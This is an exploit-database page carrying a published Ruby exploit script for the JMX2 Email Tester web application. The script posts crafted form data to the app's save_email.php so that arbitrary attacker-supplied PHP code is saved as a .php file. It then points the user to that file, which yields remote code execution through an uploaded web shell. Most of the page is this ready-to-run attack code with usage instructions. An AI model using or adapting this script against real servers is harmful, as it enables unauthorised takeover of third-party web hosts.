JMX2 Email Tester - Web Shell Upload(save_email.php)

2016.02.16
Credit: HaHwul
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php) # Date: 2016-02-15 # Blog: http://www.hahwul.com # Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester # Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip # Tested on: debian [wheezy] # CVE : none require "net/http" require "uri" require 'uri-handler' if ARGV.length != 2 puts "JMX2 Email Tester Web Shell Uploader" puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]" puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester" puts " phpCode(ex): echo 'zzzzz'" puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'" puts " Install GEM: #> gem install uri-handler" puts " exploit & code by hahwul[www.hahwul.com]" else target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/ shell = ARGV[1] # PHP Code shell = shell.to_uri exp_url = target_url + "/models/save_email.php" puts shell uri = URI.parse(exp_url) http = Net::HTTP.new(uri.host, uri.port) puts exp_url request = Net::HTTP::Post.new(uri.request_uri) request["Accept-Encoding"] = "gzip, deflate" request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/" request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0" request["Accept"] = "application/json, text/javascript, */*; q=0.01" request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" request["Connection"] = "keep-alive" request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"}) response = http.request(request) puts "[Result] Status code: "+response.code puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php" end

References:

http://www.hahwul.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top